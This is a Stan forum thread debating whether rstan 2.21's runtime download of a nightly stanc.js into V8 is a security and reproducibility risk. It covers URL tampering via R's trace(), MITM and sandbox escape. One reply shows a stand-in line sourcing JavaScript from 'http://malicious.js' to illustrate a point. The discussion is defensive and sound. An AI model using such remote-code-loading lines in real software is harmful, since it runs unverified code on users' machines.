Dangerous design in rstan 2.21

mespe · July 9, 2020, 2:56pm

The current version of rstan requires V8 to retrieve Javascript code from https://github.com/stan-dev/stanc3/releases/download/nightly/stanc.js. I believe this is a poor design decision for the following reasons:

Inability to execute without internet access (I often work in areas without internet access)
Hides the Javascript code, making code review and verification more difficult.
Lack of reproducibility, given that the javascript can be updated in significant ways without a change in rstan versioning
Many commits to rstan are not GPG verified, creating a potential security vulnerability. Additionally, there are no SHA checks on the file, nor any verification that it is from a trusted source.
V8 is not a small dependency. On my system, I have to build from source, which takes 45 min

This issues are significant enough that I will not be installing the current version of rstan, and am removing the dependencies to rstan in my packages where I can.

I encourage the developers to reconsider this design.

bgoodri · July 9, 2020, 3:02pm

It just times out if there is no internet access
The javascript stanc3 is from https://github.com/stan-dev/stanc3/releases/tag/nightly but it is not really human readable. It is derived from the OCaml stanc3.
We need to change the javascript in between rstan releases so that we can iron out the bugs, such as https://github.com/stan-dev/stanc3/issues/611 , before we can get rid of the non-javascript parser and bundle the released javascript stanc3 with rstan or StanHeaders
If you have to compile the V8 package from source, then it may take a while but you would have to do that anyway for rstan 2.24.

mespe · July 9, 2020, 3:16pm

My points still stand - this is a dangerous design, and should be reconsidered.

Timing out is not helpful. It means rstan is unusable without internet access. Why should my modeling software require internet to work?
Human readable is not the point. I often use meta-programming to review code before installing. This adds a layer of obfuscation, and complicates code review because the code needs to be reviewed each time I compile a stan model. You might not read this code, that that does not mean the code should not be easy to review.
This should be reserved for a development version, then. I need to reproduce even bugs - having software that silently updates/changes is terrible for reproducible science.
There are systems (cloud compute) where I do not want to spend 45 min compiling V8.

Unaddressed in your response: this is a big security issue.

These changes are making rstan unusable for my current situations, and difficult to recommend for clients. I hope you reconsider.

bgoodri · July 9, 2020, 3:37pm

That is just not correct. RStan 2.21 uses the old stanc parser but then checks whether it would also parse with the next stanc

github.com

stan-dev/rstan/blob/develop/rstan/rstan/R/stanc.R#L59


      
          if (is.null(attr(model_code, "model_name2")))
            attr(model_code, "model_name2") <- model_name2
          
          model_code <- get_model_strcode(file, model_code)
          if (missing(model_name) || is.null(model_name))
            model_name <- attr(model_code, "model_name2")
          
          model_attr <- attributes(model_code)
          model_code <- scan(text = model_code, what = character(), sep = "\n", quiet = TRUE)
          
          # Remove trailing whitespaces
          model_code <- trimws(model_code, "r")
          
          includes <- grep("^[[:blank:]]*#include ", model_code)
          while(length(includes) > 0) {
            for (i in rev(includes)) {
              header <- sub("^[[:blank:]]*#include[[:blank:]]+", "", model_code[i])
              header <- gsub('\\"', '', header)
              header <- gsub("\\'", '', header)
              header <- sub("<", "", header, fixed = TRUE)
              header <- sub(">", "", header, fixed = TRUE)

If the download times out after 5 seconds, then it just returns FALSE and moves on with the generated C++ code by the old stanc.

So, the security considerations from the generated C++ code are no different than what they have been for the last 6 years that the old stanc has been on CRAN. Someone malicious would have to get a PR merged that makes stanc3 do something malicious even though the C++ code it generates is not compiled. And if they can do that, they can do that for Stan 2.24 in which case the danger will still be there when StanHeaders / rstan 2.24 comes with it.

mespe · July 9, 2020, 9:40pm

This is not true - I can substitute the URL inside the function body of stanc_beta() with a simple call to trace() to point the function at whatever javascript I want. R code is extremely mutable, so you cannot assume a hard coded URL provides security. The security concern is that you are pulling a file from the internet and compiling it into the model with zero verification that it should be trusted. For the current C++, I can check the code in the current version of, e.g. StanHeaders, and once checked I can be reasonably sure it will not change unless I update the package. Here, the code can change daily or to a different source URL with no indication to the end-user. For it to be secure, you need to, at minimum, provide some verification. You should also provide versioning and a notice to the end-user.

You second point is exactly the problem with this design - the behavior of my model can depend on whether github/my connection is down. This is not reproducible! I cannot use rstan without some assurance that it is reproducible (nor should any scientist).

Or put another way, when I report my results, do I need to also report the exact date and time that the model was compiled? And even with that, is there any way for someone to get that version of the nightly build to reproduce my results?

Bluntly, this is a bad design to ensure a Stan model is reproducible, and a worse one to ensure it is secure. Please re-evaluate this design.

mespe · July 9, 2020, 9:56pm

And, if you would like proof of concept, I am happy to write some malicious R code to demonstrate this concern.

To be clear, to abuse this, I do not need control of rstan’s source at all.

bgoodri · July 9, 2020, 10:14pm

Whether or not RStan 2.21.x checks whether the Stan program parses with the nightly javascript stanc3 has literally nothing to do with the reproducibility of the MCMC results because it has absolutely zero effect on the C++ code that gets generated by the old stanc parser. To verify, you can look at the GitHub code that I linked to before

github.com

stan-dev/rstan/blob/develop/rstan/rstan/R/stanc.R#L59


      
          if (is.null(attr(model_code, "model_name2")))
            attr(model_code, "model_name2") <- model_name2
          
          model_code <- get_model_strcode(file, model_code)
          if (missing(model_name) || is.null(model_name))
            model_name <- attr(model_code, "model_name2")
          
          model_attr <- attributes(model_code)
          model_code <- scan(text = model_code, what = character(), sep = "\n", quiet = TRUE)
          
          # Remove trailing whitespaces
          model_code <- trimws(model_code, "r")
          
          includes <- grep("^[[:blank:]]*#include ", model_code)
          while(length(includes) > 0) {
            for (i in rev(includes)) {
              header <- sub("^[[:blank:]]*#include[[:blank:]]+", "", model_code[i])
              header <- gsub('\\"', '', header)
              header <- gsub("\\'", '', header)
              header <- sub("<", "", header, fixed = TRUE)
              header <- sub(">", "", header, fixed = TRUE)

The old stanc runs the same as it has for six years and then in line 59 it conditionally calls to stanc_beta() — which either returns TRUE or FALSE rather than any code — and stanc does nothing with with that TRUE or FALSE and unconditionally returns r that it defined up on line 38.

Or you can verify by running

example(stanc, package = "rstan", run.dontrun = TRUE) # defines stanmodelcode
writeLines(r$cppcode)

whose first few lines are

// Code generated by Stan version 2.21.0
#include <stan/model/model_header.hpp>
namespace model7ee02059f29e_normal1_namespace {
using std::istream;

If instead we call

ctx <- V8::v8()
ctx$source("https://github.com/stan-dev/stanc3/releases/download/nightly/stanc.js")
writeLines(ctx$call("stanc", "security_flaw", "data {}")$result)

the first few lines are

// Code generated by stanc 458a7933
#include <stan/model/model_header.hpp>
namespace security_flaw_namespace {
inline void validate_positive_index(const char* var_name, const char* expr,

Clearly the C++ code being generated by rstan::stanc(), which is subsequently compiled and executed, is not the C++ code that the javascript produces, which is not compiled and executed, because we are only using the javascript version to test if that Stan program will continue to work once Stan 2.24 is released.

So, the only difference is that you might get a message saying that your Stan program won’t work in the future and you should file an issue; the MCMC results are going to be the same either way.

bgoodri · July 9, 2020, 10:20pm

If someone were to call trace or debug(rstan:::stanc_beta), then could source a random javascript file into that V8 context. But they can also just do in the R global environment

ctx <- V8::v8()
ctx$source("http://malicious.js")

There are tons of hackers out there in the world who are trying to come up with ways to break out of the virtual machine that V8 runs the javascript in. And sometimes they succeed. But those hackers will still be hacking when Stan 2.24 is released.

mespe · July 9, 2020, 11:10pm

Thank you for the clarification - I see that this is not currently getting used, but my concern is that this was the design going forward (i.e. stanc_beta() would become stanc()). You seem to indicate this is not the case. Sorry for misunderstanding that this would not be how rstan 2.24 operates.

However, the security concern still stands: The concern here is not that malicious code can be executed at the console - of course the biggest security threat is the end user. Of course you can cause havoc by getting the user to type code, or even just sourcing in bad code. That is the reason there is a general warning against source()-ing R scripts from URLs.

The issue here is your “trusted” function loads this javascript code without verification, silently. Most end users will not know this is even happening. The key difference here is that rstan is a “trusted” application by many users, but this mechanism should not be trusted. It is extremely easy to manipulate.

bgoodri · July 10, 2020, 12:06am

The plan is (and has been) for RStan 2.24 to come with a released version of the javascript version of stanc3, at which point the (internal) rstan:::stanc_beta() function will cease to exist and its body will be mostly transplanted into the body of the (exported) rstan::stanc() function, except that it will use the javascript file that it comes with rather than downloading it from the internet.

But we can’t release a RStan 2.24 until we have squashed almost all of the known bugs with the javascript stanc3, which is why we need to check thousands of Stan programs against the nightly javascript stanc3 in the next few weeks as we merge more PRs into it. V8 is more safe than R or C++ or most other languages in that it does not let the javascript access the filesystem, which is why we have to use the C preprocessor to first process the #include statements in Stan files in stanc_beta(). Downloading over https from a fixed URL is a lot safer than some other things. I honestly have little idea how the OCaml parser works or how it gets translated into javascript, but I have to trust the Stan developers that maintain it. Without that, there are all sorts of ways that code in the Stan repos could potentially do malicious things.

mespe · July 10, 2020, 3:41am

“A lot safer than some other things” is not particularly reassuring.

rok_cesnovar · July 10, 2020, 4:35am

So you are saying that what worries you is that Stan devs will manipulate the OCaml code which is translated to javascript by the build script to do something malicious? How does that change compared to the R code or C++ code?

It does not. In order to do something malicious one would have to change the codebase and get a PR to pass the code review. This is the same and was this way always for C++ or OCaml.

You can either trust the Stan devs or read the codebase to make sure. And this is the same with rstan 2.19, 2.0, 2.24 and any othee Stan interface or any open source project.

rok_cesnovar · July 10, 2020, 4:41am

You can easily do almost anything you want with R code as well. Just beacuse a part of the codebase has changed the language in which it is written, does not make it any unsafer. If anything the fact that JS runs in a virtual engine makes it safer not more dangerous.

mespe · July 10, 2020, 2:24pm

Actually, my concern has nothing to do with Stan Devs. You are misunderstanding the threat here.

To abuse this, you DO NOT need to get a PR on Stan, you do not need to have any interaction with the source code.

The attack vector is that “hard coded” URLs in R code can be easily manipulated in R because R allows you to program on the language. It would be trivial to point this URL at a different site and download a different javascript script without 1) altering the code base on github/CRAN/etc., 2) the end user knowing anything was different. All I need to know is that rstan v2.21 is installed on a system.

In general, R users are heavily discouraged from “source” scripts from URLs because it can be really dangerous. This recent rstan change does just that.

This has nothing to do with changing coding languages, nothing to do with PR on github, nothing to do with trusting the Stan Dev. team. This specific method is insecure by nature - you should NOT download and execute code from a URL without some verification that the script is the one you expect. This is the foundation of checksum systems.

Yes, the virtualization layer of V8 provides some security, but V8 by default is not sandboxed. If you want to rely on V8 to provide sufficient security to run untrusted code, you need to do a lot more here.

At minimum, you should provide a means to turn off this “feature”. You have zero opt-in, zero documentation, and zero notification that this happening. You have presumed that your users should accept this risk to aid your debugging.

You might feel comfortable with this, but I do not.

Charles_Driver · July 10, 2020, 2:28pm

Mespe – I think the point that needs clarifying is: If an attacker has access to R, in what way does having rstan on the system enhance the threat?

mespe · July 10, 2020, 2:52pm

The threat is that this provides a means to download and execute unknown code via a trusted program. I would guess few rstan users would expect that rstan is downloading new code and running it each time they build a model. Most would expect rstan to be self-contained.

A central idea with R package security, weak though it may be, is that you can inspect the source code BEFORE running it. However, this particular method is not secure. Here, new code is loaded and executed silently when the Stan model is parsed. That code is not signed or verified in any way.

The central point: I can verify Stan, rstan, etc. but then rstan can then load code which is unverified.

If an R package had R code which did

source("https:.../my_script.R")

it would likewise be dangerous. There is a group that is working to flag R packages with this type of behavior and remove it.

Charles_Driver · July 10, 2020, 3:16pm

I can only follow your argument if you say you don’t trust the dev-team / their repositories. An attacker with access to R doesn’t need rstan to cause problems, as already demonstrated above.

aakhmetz · July 11, 2020, 6:42am

Yesterday I had some trouble with compiling V8-r on Archlinux, because the AUR package was broken and it did take much time for compiling V8 from source. Conda have the r-v8 package but it is available only for R ver. 3.6, but not for 4.0.

Finally, installing the libv8 package via conda and then V8 package via R terminal solved the issue. The installation did not take much time

josswright · July 11, 2020, 7:04am

(Following the slightly off-topic move…) Just for reference, I also had problems building the v8-r package on Arch Linux until very recently, but this should now have been fixed.

The problem came because the PKGBUILD relied on environment variables being shared between its prepare() and build() functions. That worked under makepkg, but broke under AUR helpers like yay. I managed to track down the issue and convince the package author to update the PKGBUILD.

So if your problem came due to installing using an AUR helper (and, if I remember rightly, gave an error relating to ninja) then you might want to check the latest update of the v8-r AUR package. (If it still doesn’t work, I’d try using makepkg directly.)

It still takes quite a while to build, though!

bgoodri · July 11, 2020, 2:58pm

would be a higher level of security risk than than the line of rstan code in question, which is

github.com

stan-dev/rstan/blob/develop/rstan/rstan/R/stanc.R#L142


      
                                        isystem = isystem)
          
            stopifnot(stanc_ctx$validate("stanc"))
            formatted_code <- try(stanc_ctx$call("stanc", model_cppname,
                                  model_code, as.array("auto-format")),
                                  silent = TRUE)
            if (!inherits(formatted_code, "try-error") && !is.null(formatted_code$result)) {
              model_code <- formatted_code$result
            }
          }
          
          model_code <- stanc_process(file = file,
                                      model_name = model_name,
                                      auto_format = FALSE,
                                      isystem = isystem)
          
          out <- stanc(model_code = model_code,
                       model_name = model_name, verbose = verbose,
                       obfuscate_model_name = obfuscate_model_name,
                       allow_undefined = allow_undefined,
                       allow_optimizations = allow_optimizations,

If someone were to run source("https:.../my_script.R"), my_script.R could make system calls or call download.file to download a virus or things of that nature.

In contrast, ctx$source("https://github.com/stan-dev/stanc3/releases/download/nightly/stanc.js") doesn’t even “download” in the traditional sense; it reads the contents of

https://github.com/stan-dev/stanc3/releases/download/nightly/stanc.js

into a Javascript context in memory, without even writing anything into tempdir(). I am not entirely sure, but I believe merely calling ctx$source does not result in the execution of any Javascript; for that you have to ctx$call a function defined by the Javascript, whereupon it is executed in a virtual machine that is designed to prohibit access to the file system. So, unlike source("https:.../my_script.R"), the rstan code in question should not be result in system calls or downloading viruses to the hard disk.

As far as I can see, the increased risks from introducing the internal function stanc_beta are

In principle, there could be a Man-In-The-Middle attack where it redirects the download to some other URL. However, such an attack is very unlikely over https and even less likely against GitHub whose business model necessitates that it keep its TLS certifications up to date (i.e. without that git clone https://github.com/... and many other git subcommands would be broken for the entire world). Moreover, the redirected download would still have to be a Javascript file (with a stanc method) that would still need to somehow escape the virtual machine to do any real damage. And someone with the skills to pull of an attack that awesome would target a larger user-base than Stan users.
There might be a variant of (1) where instead of deleting the hard drive, the stanc method in the malicious Javascript mines bitcoins or something. This is only somewhat more likely and seems more annoying than dangerous. Also, I believe it is the case that ctx gets garbage collected when stanc_beta() finishes, in which case it would only mine bitcoins for a few milliseconds and thus not be worthwhile.

I am sure any security researcher would say that using Stan is a big risk, largely because it compiles and executes C++ code that is generated on-the-fly and utilizes a bunch of huge libraries. However, Stan has not had a (known) security incident in 9+ years, and there are plausible reasons for that. The biggest risk is probably that someone gets a PR merged that maliciously changes the way the parser generates the C++ code, but I have to trust that the stanc3 devs are vigilant about that.

Finally, if any malicious hackers who are reading this knows how to install OCaml from source on Windows in order to develop your viruses, please let us know.

Topic		Replies	Views
Rstan and Stan 2.20.0 RStan rstan	8	2528	April 24, 2020
Parser failed badly; maybe try installing the V8 package Modeling rstan	4	982	March 23, 2024
Rstan - (prob crazy question) is the compilation method changing via internet? Interfaces rstan	3	328	September 29, 2020
Status on RStan, CRAN, and latest versions of Stan? RStan	43	2671	July 27, 2022
Stanc3 compile-failure message for model compiled using rstan RStan	1	274	December 11, 2020

Dangerous design in rstan 2.21

Related topics